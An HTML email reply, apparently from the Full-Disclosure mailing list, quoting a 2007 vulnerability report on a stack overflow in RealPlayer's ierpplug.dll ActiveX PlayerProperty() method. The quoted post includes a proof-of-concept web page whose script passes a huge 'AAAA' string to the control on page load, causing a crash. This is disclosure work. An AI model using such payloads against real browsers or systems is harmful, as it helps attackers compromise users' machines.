Ouch! <br><br><div class="gmail_quote">On Nov 26, 2007 9:15 PM, Elazar Broad &lt;<a href="mailto:elazarb@earthlink.net">elazarb@earthlink.net</a>&gt; wrote:<br><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
After some creative Googling, I am revising my original post. I believe that the Import() method overflow that I originally posted is really <a href="http://www.securityfocus.com/bid/26130" target="_blank">http://www.securityfocus.com/bid/26130
</a>, although I am not sure why Linux is listed under the &quot;Vulnerable&quot; section, so I am taking it out of the PoC code. Real claims to have patched this back in October, but I can still throw a stack overflow exception via this function using the originally stated version of RealPlayer(which I installed last night). I am now listing this vulnerability as RealNetworks RealPlayer 
ierpplug.dll ActiveX Control PlayerProperty() Method Stack Overflow, and it might be wise to list this under a separate BID. PoC as follows:<br><br>-------------<br>&lt;!--<br>written by e.b.<br>--&gt;<br>&lt;html&gt;<br>
&nbsp;&lt;head&gt;<br> &nbsp;&lt;script language=&quot;JavaScript&quot; DEFER&gt;<br> &nbsp; &nbsp;function Check() {<br> &nbsp; &nbsp;var s = &quot;AAAA&quot;;<br><br> &nbsp; &nbsp;while (s.length &lt; 999999) s=s+s;<br><br> &nbsp; &nbsp; var obj = new ActiveXObject(&quot;
IERPCTL.IERPCTL&quot;); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}<br><br> &nbsp; &nbsp; &nbsp;var obj2 = obj.PlayerProperty(s);<br><br><br> &nbsp; }<br> &nbsp;&lt;/script&gt;<br><br>&nbsp;&lt;/head&gt;<br>&nbsp;&lt;body onload=&quot;JavaScript: return Check();&quot;&gt;
<br><br>&nbsp;&lt;/body&gt;<br>&lt;/html&gt;<br>-------------<br><br>Elazar<br><br>_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">
http://lists.grok.org.uk/full-disclosure-charter.html</a><br>Hosted and sponsored by Secunia - <a href="http://secunia.com/" target="_blank">http://secunia.com/</a><br></blockquote></div><br><br clear="all"><br>-- <br><a href="http://www.goldwatches.com/coupons/">
http://www.goldwatches.com/coupons/</a><br><a href="http://www.jewelerslounge.com">http://www.jewelerslounge.com</a>